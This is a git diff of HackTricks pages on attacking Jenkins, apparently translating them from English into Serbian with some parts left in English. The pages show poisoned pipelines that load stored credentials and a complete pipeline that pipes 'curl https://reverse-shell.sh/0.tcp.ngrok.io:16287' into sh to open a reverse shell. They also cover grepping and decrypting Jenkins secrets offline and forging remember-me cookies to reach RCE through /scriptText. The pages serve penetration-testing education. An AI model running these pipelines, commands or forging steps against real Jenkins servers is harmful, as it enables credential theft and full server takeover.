+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
 
-    stages {
-        stage("Build") {
-                environment {
-                    STAGE_ENV_VAR = "Test stage ENV variables."
-                }
-                steps {
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
 ```
-
 ### Dumping secrets
 
-For information about how are secrets usually treated by Jenkins check out the basic information:
+Za informacije o tome kako se tajne obično tretiraju u Jenkinsu, pogledajte osnovne informacije:
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
-
-There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
+Akreditivi mogu biti **ograničeni na globalne provajdere** (`/credentials/`) ili na **specifične projekte** (`/job//configure`). Stoga, da biste eksfiltrirali sve njih, morate **kompromitovati barem sve projekte** koji sadrže tajne i izvršiti prilagođene/otrovane pipeline-ove.
 
+Postoji još jedan problem, da biste dobili **tajnu unutar env** pipeline-a, morate **znati ime i tip tajne**. Na primer, ako pokušate da **učitate** **`usernamePassword`** **tajnu** kao **`string`** **tajnu**, dobićete ovu **grešku**:
 ```
 ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
 ```
-
-Here you have the way to load some common secret types:
-
+Evo kako da učitate neke uobičajene tipove tajni:
 ```bash
 withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
-    sh '''
-        env #Search for USERNAME and PASS
-    '''
+sh '''
+env #Search for USERNAME and PASS
+'''
 }
 
 withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
-    sh '''
-        env #Search for SECRET
-    '''
+sh '''
+env #Search for SECRET
+'''
 }
 
 withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
-    sh '''
-        env # Search for USERPASS
-    '''
+sh '''
+env # Search for USERPASS
+'''
 }
 
 # You can also load multiple env variables at once
 withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
-                 string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
-     sh '''
-        env
-    '''
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+env
+'''
 }
 ```
-
-At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+Na kraju ove stranice možete **pronaći sve tipove kredencijala**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
 
 > [!WARNING]
-> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
+> Najbolji način da **izvučete sve tajne odjednom** je da **kompromitujete** **Jenkins** mašinu (na primer, pokretanjem reverzne ljuske u **ugrađenom čvoru**) i zatim **procurite** **master ključeve** i **šifrovane tajne** i dešifrujete ih van mreže.\
+> Više o tome kako to uraditi u [odeljku Čvorovi i Agenti](./#nodes-and-agents) i u [odeljku Post Eksploatacija](./#post-exploitation).
 
-### Triggers
+### Okidači
 
-From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
-
-Cron example:
+Iz [dokumentacije](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): Direktiva `triggers` definiše **automatske načine na koje bi Pipeline trebao biti ponovo aktiviran**. Za Pipelines koji su integrisani sa izvorom kao što su GitHub ili BitBucket, `triggers` možda neće biti potrebni jer će integracija zasnovana na webhook-ovima verovatno već biti prisutna. Trenutno dostupni okidači su `cron`, `pollSCM` i `upstream`.
 
+Primer crona:
 ```bash
 triggers { cron('H */4 * * 1-5') }
 ```
-
 Check **other examples in the docs**.
 
 ### Nodes & Agents
@@ -258,54 +242,50 @@ For more information check the basic information:
 basic-jenkins-information.md
 {{#endref}}
 
-You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
+You can enumerate the **configured nodes** in `/computer/`, you will usually find the **`Built-In Node`** (which is the node running Jenkins) and potentially more:
 
 ![](<../../images/image (249).png>)
 
-It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
+It is **posebno zanimljivo kompromitovati Built-In node** because it contains sensitive Jenkins information.
 
 To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
-
 ```bash
 pipeline {
-    agent {label 'built-in'}
+agent {label 'built-in'}
 ```
+### Potpuni primer
 
-### Complete example
-
-Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
-
+Pipeline u specifičnom agentu, sa cron okidačem, sa pipeline i stage env varijablama, učitavajući 2 varijable u koraku i šaljući reverznu ljusku:
 ```bash
 pipeline {
-    agent {label 'built-in'}
-    triggers { cron('H */4 * * 1-5') }
-    environment {
-        GENERIC_ENV_VAR = "Test pipeline ENV variables."
-    }
+agent {label 'built-in'}
+triggers { cron('H */4 * * 1-5') }
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
 
-    stages {
-        stage("Build") {
-                environment {
-                    STAGE_ENV_VAR = "Test stage ENV variables."
-                }
-                steps {
-            withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
-                     string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
-                sh '''
-                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
-                '''
-            }
-        }
-    }
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
+withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
+'''
+}
+}
+}
 
-    post {
-        always {
-            cleanWs()
-        }
-    }
+post {
+always {
+cleanWs()
+}
+}
 }
 ```
-
 ## Arbitrary File Read to RCE
 
 {{#ref}}
@@ -329,40 +309,37 @@ jenkins-rce-creating-modifying-pipeline.md
 ## Post Exploitation
 
 ### Metasploit
-
 ```
 msf> post/multi/gather/jenkins_gather
 ```
+### Jenkins Tajne
 
-### Jenkins Secrets
+Možete da navedete tajne pristupajući `/credentials/` ako imate dovoljno dozvola. Imajte na umu da će ovo samo navesti tajne unutar `credentials.xml` datoteke, ali **datoteke za konfiguraciju gradnje** takođe mogu imati **više kredencijala**.
 
-You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
+Ako možete **videti konfiguraciju svakog projekta**, takođe možete videti u njoj **imena kredencijala (tajni)** koji se koriste za pristup repozitorijumu i **druge kredencijale projekta**.
 
 ![](<../../images/image (180).png>)
 
-#### From Groovy
+#### Iz Groovy
 
 {{#ref}}
 jenkins-dumping-secrets-from-groovy.md
 {{#endref}}
 
-#### From disk
+#### Sa diska
 
-These files are needed to **decrypt Jenkins secrets**:
+Ove datoteke su potrebne za **dešifrovanje Jenkins tajni**:
 
 - secrets/master.key
 - secrets/hudson.util.Secret
 
-Such **secrets can usually be found in**:
+Takve **tajne se obično mogu naći u**:
 
 - credentials.xml
 - jobs/.../build.xml
 - jobs/.../config.xml
 
-Here's a regex to find them:
-
+Evo regex-a da ih pronađete:
 ```bash
 # Find the secrets
 grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
 # Secret example
 credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}
 ```
-
 #### Decrypt Jenkins secrets offline
 
-If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
-
+Ako ste izvezli **potrebne lozinke za dešifrovanje tajni**, koristite [**ovaj skript**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **da dešifrujete te tajne**.
 ```bash
 python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
 06165DF2-C047-4402-8CAB-1C8EC526C115
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
 ```
-
-#### Decrypt Jenkins secrets from Groovy
-
+#### Dešifrovati Jenkins tajne iz Groovy-a
 ```bash
 println(hudson.util.Secret.decrypt("{...}"))
 ```
+### Kreirajte novog admin korisnika
 
-### Create new admin user
+1. Pristupite Jenkins config.xml datoteci u `/var/lib/jenkins/config.xml` ili `C:\Program Files (x86)\Jenkis\`
+2. Potražite reč `true` i promenite reč **`true`** u **`false`**.
+1. `sed -i -e 's/truefalsetrue` i **ponovo restartujte Jenkins**.
 
-1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
-2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**.
-   1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**.
-
-## References
+## Reference
 
 - [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
 - [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}"))
 - [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 6e62a8536..b75b14559 100644
--- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -1,87 +1,87 @@
-# Basic Jenkins Information
+# Osnovne informacije o Jenkinsu
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Access
+## Pristup
 
-### Username + Password
+### Korisničko ime + Lozinka
 
-The most common way to login in Jenkins if with a username or a password
+Najčešći način prijave u Jenkins je putem korisničkog imena ili lozinke.
 
-### Cookie
+### Kolačić
 
-If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
+Ako se **autorizovani kolačić ukrade**, može se koristiti za pristup sesiji korisnika. Kolačić se obično naziva `JSESSIONID.*`. (Korisnik može prekinuti sve svoje sesije, ali prvo mora saznati da je kolačić ukraden).
 
-### SSO/Plugins
+### SSO/Pluginovi
 
-Jenkins can be configured using plugins to be **accessible via third party SSO**.
+Jenkins se može konfigurisati pomoću pluginova da bude **dostupan putem treće strane SSO**.
 
-### Tokens
+### Tokeni
 
-**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
+**Korisnici mogu generisati tokene** kako bi omogućili pristup aplikacijama da ih imituju putem CLI ili REST API.
 
-### SSH Keys
+### SSH Ključevi
 
-This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
+Ova komponenta pruža ugrađeni SSH server za Jenkins. To je alternativno sučelje za [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), a komande se mogu pozivati na ovaj način koristeći bilo koji SSH klijent. (Iz [dokumentacije](https://plugins.jenkins.io/sshd/))
 
-## Authorization
+## Autorizacija
 
-In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
+U `/configureSecurity` moguće je **konfigurisati metodu autorizacije Jenkins-a**. Postoji nekoliko opcija:
 
-- **Anyone can do anything**: Even anonymous access can administrate the server
-- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **Svako može raditi šta hoće**: Čak i anonimni pristup može administrirati server.
+- **Legacy mode**: Isto kao Jenkins <1.164. Ako imate **"admin" ulogu**, dobićete **potpunu kontrolu** nad sistemom, a **inače** (uključujući **anonimne** korisnike) imaćete **pristup za čitanje**.
+- **Prijavljeni korisnici mogu raditi šta hoće**: U ovom režimu, svaki **prijavljeni korisnik dobija potpunu kontrolu** nad Jenkins-om. Jedini korisnik koji neće imati potpunu kontrolu je **anonimni korisnik**, koji dobija samo **pristup za čitanje**.
+- **Matrix-based security**: Možete konfigurisati **ko može raditi šta** u tabeli. Svaki **stubac** predstavlja **dozvolu**. Svaki **red** **predstavlja** **korisnika ili grupu/ulogu.** Ovo uključuje posebnog korisnika '**anonimni**', koji predstavlja **neautentifikovane korisnike**, kao i '**autentifikovani**', koji predstavlja **sve autentifikovane korisnike**.
 
 ![](<../../images/image (149).png>)
 
-- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **Strategija autorizacije zasnovana na projektima:** Ovaj režim je **proširenje** na "**Matrix-based security**" koje omogućava dodatnu ACL matricu da bude **definisana za svaki projekat posebno.**
+- **Strategija zasnovana na rolama:** Omogućava definisanje autorizacija koristeći **strategiju zasnovanu na rolama**. Upravljajte rolama u `/role-strategy`.
 
-## **Security Realm**
+## **Sigurnosno područje**
 
-In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
+U `/configureSecurity` moguće je **konfigurisati sigurnosno područje.** Po defaultu, Jenkins uključuje podršku za nekoliko različitih sigurnosnih područja:
 
-- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **Delegirati servlet kontejneru**: Za **delegiranje autentifikacije servlet kontejneru koji pokreće Jenkins kontroler**, kao što je [Jetty](https://www.eclipse.org/jetty/).
+- **Jenkinsova vlastita baza korisnika:** Koristite **Jenkinsovu ugrađenu bazu podataka korisnika** za autentifikaciju umesto delegiranja na eksterni sistem. Ovo je omogućeno po defaultu.
+- **LDAP**: Delegirati svu autentifikaciju na konfigurisan LDAP server, uključujući i korisnike i grupe.
+- **Unix baza korisnika/grupa**: **Delegira autentifikaciju na osnovnu Unix** OS bazu korisnika na Jenkins kontroleru. Ovaj režim će takođe omogućiti ponovnu upotrebu Unix grupa za autorizaciju.
 
-Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
+Pluginovi mogu pružiti dodatna sigurnosna područja koja mogu biti korisna za uključivanje Jenkinsa u postojeće identitetske sisteme, kao što su:
 
 - [Active Directory](https://plugins.jenkins.io/active-directory)
 - [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
 - [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
 
-## Jenkins Nodes, Agents & Executors
+## Jenkins Čvorovi, Agenti i Izvršioci
 
-Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+Definicije iz [dokumentacije](https://www.jenkins.io/doc/book/managing/nodes/):
 
-**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
+**Čvorovi** su **mašine** na kojima se izvršavaju **agenti za izgradnju**. Jenkins prati svaki priključeni čvor za slobodan prostor na disku, slobodan temp prostor, slobodan swap, vreme/sinkronizaciju sata i vreme odgovora. Čvor se uzima offline ako bilo koja od ovih vrednosti pređe konfigurisani prag.
 
-**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
+**Agenti** **upravljaju** **izvršenjem zadataka** u ime Jenkins kontrolera koristeći **izvršioce**. Agent može koristiti bilo koji operativni sistem koji podržava Javu. Alati potrebni za izgradnje i testove su instalirani na čvoru gde agent radi; mogu se **instalirati direktno ili u kontejneru** (Docker ili Kubernetes). Svaki **agent je zapravo proces sa svojim PID** na host mašini.
 
-An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
+**Izvršilac** je **slot za izvršenje zadataka**; zapravo, to je **nit u agentu**. **Broj izvršilaca** na čvoru definiše broj **paralelnih zadataka** koji se mogu izvršiti na tom čvoru u jednom trenutku. Drugim rečima, ovo određuje **broj paralelnih Pipeline `stages`** koji mogu izvršiti na tom čvoru u jednom trenutku.
 
-## Jenkins Secrets
+## Jenkins Tajne
 
-### Encryption of Secrets and Credentials
+### Enkripcija Tajni i Akreditiva
 
-Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
+Definicija iz [dokumentacije](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins koristi **AES za enkripciju i zaštitu tajni**, akreditiva i njihovih odgovarajućih ključeva za enkripciju. Ovi ključevi za enkripciju se čuvaju u `$JENKINS_HOME/secrets/` zajedno sa glavnim ključem koji se koristi za zaštitu navedenih ključeva. Ovaj direktorijum treba konfigurisati tako da samo korisnik operativnog sistema pod kojim Jenkins kontroler radi ima pristup za čitanje i pisanje u ovaj direktorijum (tj. `chmod` vrednost `0700` ili korišćenjem odgovarajućih atributa datoteka). **Glavni ključ** (ponekad nazvan "ključ za enkripciju ključeva" u kriptožargonu) je **pohranjen \_nekriptovan\_** na datotečnom sistemu Jenkins kontrolera u **`$JENKINS_HOME/secrets/master.key`** što ne štiti od napadača sa direktnim pristupom toj datoteci. Većina korisnika i programera će koristiti ove ključeve za enkripciju indirektno putem [Secret](https://javadoc.jenkins.io/byShortName/Secret) API za enkripciju generičkih tajnih podataka ili putem API za akreditive. Za kriptozainteresovane, Jenkins koristi AES u režimu blokovne enkripcije (CBC) sa PKCS#5 punjenjem i nasumičnim IV-ima za enkripciju instanci [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) koje se čuvaju u `$JENKINS_HOME/secrets/` sa imenom datoteke koje odgovara njihovom `CryptoConfidentialKey` id. Uobičajeni id ključeva uključuju:
 
-- `hudson.util.Secret`: used for generic secrets;
-- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`: korišćen za generičke tajne;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: korišćen za neke tipove akreditiva;
+- `jenkins.model.Jenkins.crumbSalt`: korišćen od strane [CSRF zaštitnog mehanizma](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); i
 
-### Credentials Access
+### Pristup Akreditivima
 
-Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project.
+Akreditivi mogu biti **ograničeni na globalne provajdere** (`/credentials/`) kojima može pristupiti bilo koji konfigurisani projekat, ili mogu biti ograničeni na **specifične projekte** (`/job//configure`) i stoga dostupni samo iz specifičnog projekta.
 
-According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
+Prema [**dokumentaciji**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Akreditivi koji su u opsegu su dostupni za pipeline bez ograničenja. Da bi se **sprečilo slučajno izlaganje u logu izgradnje**, akreditivi su **maskirani** iz redovnog izlaza, tako da poziv `env` (Linux) ili `set` (Windows), ili programi koji štampaju svoje okruženje ili parametre ne bi **otkrili njih u logu izgradnje** korisnicima koji inače ne bi imali pristup akreditivima.
 
-**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
+**Zato napadač treba, na primer, da ih base64 kodira da bi ih eksfiltrirao.**
 
-## References
+## Reference
 
 - [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
 - [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
@@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
 - [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
index 9d2b232e1..6ab10baa4 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -2,15 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+U ovom blog postu je moguće pronaći sjajan način da se transformiše ranjivost Local File Inclusion u Jenkins-u u RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
 
-This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
+Ovo je AI kreirani sažetak dela posta gde se zloupotrebljava kreacija proizvoljnog kolačića da bi se dobio RCE zloupotrebom lokalnog čitanja datoteka dok ne budem imao vremena da napravim svoj sažetak:
 
 ### Attack Prerequisites
 
-- **Feature Requirement:** "Remember me" must be enabled (default setting).
-- **Access Levels:** Attacker needs Overall/Read permissions.
-- **Secret Access:** Ability to read both binary and textual content from key files.
+- **Feature Requirement:** "Remember me" mora biti omogućeno (podrazumevani postavka).
+- **Access Levels:** Napadač treba Overall/Read dozvole.
+- **Secret Access:** Sposobnost čitanja binarnog i tekstualnog sadržaja iz ključnih datoteka.
 
 ### Detailed Exploitation Process
 
@@ -18,18 +18,18 @@ This is an AI created summary of the part of the post were the creaft of an arbi
 
 **User Information Retrieval**
 
-- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
-  - **Username**
-  - **User seed**
-  - **Timestamp**
-  - **Password hash**
+- Pristupite korisničkoj konfiguraciji i tajnama iz `$JENKINS_HOME/users/*.xml` za svakog korisnika da prikupite:
+- **Username**
+- **User seed**
+- **Timestamp**
+- **Password hash**
 
 **Secret Key Extraction**
 
-- Extract cryptographic keys used for signing the cookie:
-  - **Secret Key:** `$JENKINS_HOME/secret.key`
-  - **Master Key:** `$JENKINS_HOME/secrets/master.key`
-  - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+- Izvucite kriptografske ključeve korišćene za potpisivanje kolačića:
+- **Secret Key:** `$JENKINS_HOME/secret.key`
+- **Master Key:** `$JENKINS_HOME/secrets/master.key`
+- **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
 
 #### Step 2: Cookie Forging
 
@@ -37,73 +37,69 @@ This is an AI created summary of the part of the post were the creaft of an arbi
 
 - **Calculate Token Expiry Time:**
 
-  ```javascript
-  tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
-  ```
+```javascript
+tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Dodaje jedan sat trenutnom vremenu
+```
 
 - **Concatenate Data for Token:**
 
-  ```javascript
-  token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
-  ```
+```javascript
+token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+```
 
 **MAC Key Decryption**
 
 - **Decrypt MAC Key File:**
 
-  ```javascript
-  key = toAes128Key(masterKey)  // Convert master key to AES128 key format
-  decrypted = AES.decrypt(macFile, key)  // Decrypt the .mac file
-  if not decrypted.hasSuffix("::::MAGIC::::")
-      return ERROR;
-  macKey = decrypted.withoutSuffix("::::MAGIC::::")
-  ```
+```javascript
+key = toAes128Key(masterKey)  // Pretvori master ključ u AES128 format
+decrypted = AES.decrypt(macFile, key)  // Dešifruj .mac datoteku
+if not decrypted.hasSuffix("::::MAGIC::::")
+return ERROR;
+macKey = decrypted.withoutSuffix("::::MAGIC::::")
+```
 
 **Signature Computation**
 
 - **Compute HMAC SHA256:**
 
-  ```javascript
-  mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
-  tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
-  ```
+```javascript
+mac = HmacSHA256(token, macKey) // Izračunaj HMAC koristeći token i MAC ključ
+tokenSignature = bytesToHexString(mac) // Pretvori MAC u heksadecimalni string
+```
 
 **Cookie Encoding**
 
 - **Generate Final Cookie:**
 
-  ```javascript
-  cookie = base64.encode(
-    username + ":" + tokenExpiryTime + ":" + tokenSignature
-  ) // Base64 encode the cookie data
-  ```
+```javascript
+cookie = base64.encode(
+username + ":" + tokenExpiryTime + ":" + tokenSignature
+) // Base64 kodiraj podatke kolačića
+```
 
 #### Step 3: Code Execution
 
 **Session Authentication**
 
 - **Fetch CSRF and Session Tokens:**
-  - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
-  - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+- Napravite zahtev ka `/crumbIssuer/api/json` da dobijete `Jenkins-Crumb`.
+- Zabeležite `JSESSIONID` iz odgovora, koji će se koristiti zajedno sa kolačićem "remember-me".
 
 **Command Execution Request**
 
 - **Send a POST Request with Groovy Script:**
 
-  ```bash
-  curl -X POST "$JENKINS_URL/scriptText" \
-  --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
-  --header "Jenkins-Crumb: $CRUMB" \
-  --header "Content-Type: application/x-www-form-urlencoded" \
-  --data-urlencode "script=$SCRIPT"
-  ```
+```bash
+curl -X POST "$JENKINS_URL/scriptText" \
